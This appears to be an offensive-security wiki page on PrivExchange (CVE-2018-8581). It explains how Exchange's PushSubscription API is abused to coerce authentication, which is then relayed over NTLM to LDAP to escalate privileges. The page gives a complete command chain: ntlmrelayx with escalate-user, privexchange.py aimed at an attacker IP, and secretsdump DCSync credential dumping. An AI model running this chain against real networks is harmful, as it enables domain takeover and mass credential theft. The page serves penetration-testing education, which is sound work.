PrivExchange

CVE-2018-8581

Theory

PrivExchange relay on the PushSubscription coerced authentication, PushSubscription is an API on Exchange Web Services that allows to subscribe to push notifications. Attackers abuse it to make Exchange servers authenticate to a target of their choosing. The coerced authentication is made over HTTP, which is particularly powerful when doing NTLM relay (because of the Session Signing and MIC mitigations).

As Exchange servers usually have high privileges in a domain (i.e. WriteDacl, see Abusing ACLs), the forced authentication can then be relayed and abused to obtain domain admin privileges (see NTLM Relay and Kerberos Unconstrained Delegations).

Practice

On February 12th 2019, Microsoft released updates for Exchange which resolved

  • the coerced authentication issue

  • the fact that Exchange servers had overkill permissions leading attacker to a full domain compromission.

First, start the NTLM relay that will escalate privileges

# NTLM relaying is used to relay connexion and give DCSync privileges
ntlmrelayx.py -t ldap://$DC --escalate-user $USER_TO_ESCALATE

Using PrivExchange, we can log in on Exchange Web Services and call the API. The user must have a mailbox to make the coerced authentication.

privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET

We can now dump domain credentials throught DCSync

secretsdump.py $DOMAIN/$USER_TO_ESCALATE@$DC -just-dc

References

Last updated